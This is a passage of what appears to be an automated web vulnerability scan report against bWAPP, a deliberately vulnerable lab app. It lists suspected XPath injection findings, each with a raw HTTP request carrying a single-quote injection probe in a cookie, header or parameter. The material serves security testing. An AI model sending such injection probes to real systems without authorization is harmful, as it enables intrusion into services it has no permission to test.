Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.135. http://192.168.52.147/bWAPP/sqli_1.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.136. http://192.168.52.147/bWAPP/sqli_1.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:52 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.137. http://192.168.52.147/bWAPP/sqli_1.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.138. http://192.168.52.147/bWAPP/sqli_1.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:03 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.139. http://192.168.52.147/bWAPP/sqli_1.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13475

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.140. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.141. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.142. http://192.168.52.147/bWAPP/sqli_1.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.143. http://192.168.52.147/bWAPP/sqli_1.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.144. http://192.168.52.147/bWAPP/sqli_1.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:24 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13472

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.145. http://192.168.52.147/bWAPP/sqli_1.php [top_security_nossl cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.146. http://192.168.52.147/bWAPP/xmli_1.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:23:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.147. http://192.168.52.147/bWAPP/xmli_1.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:22 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.148. http://192.168.52.147/bWAPP/xmli_1.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:35 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.149. http://192.168.52.147/bWAPP/xmli_1.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:06 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.150. http://192.168.52.147/bWAPP/xmli_1.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:57 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
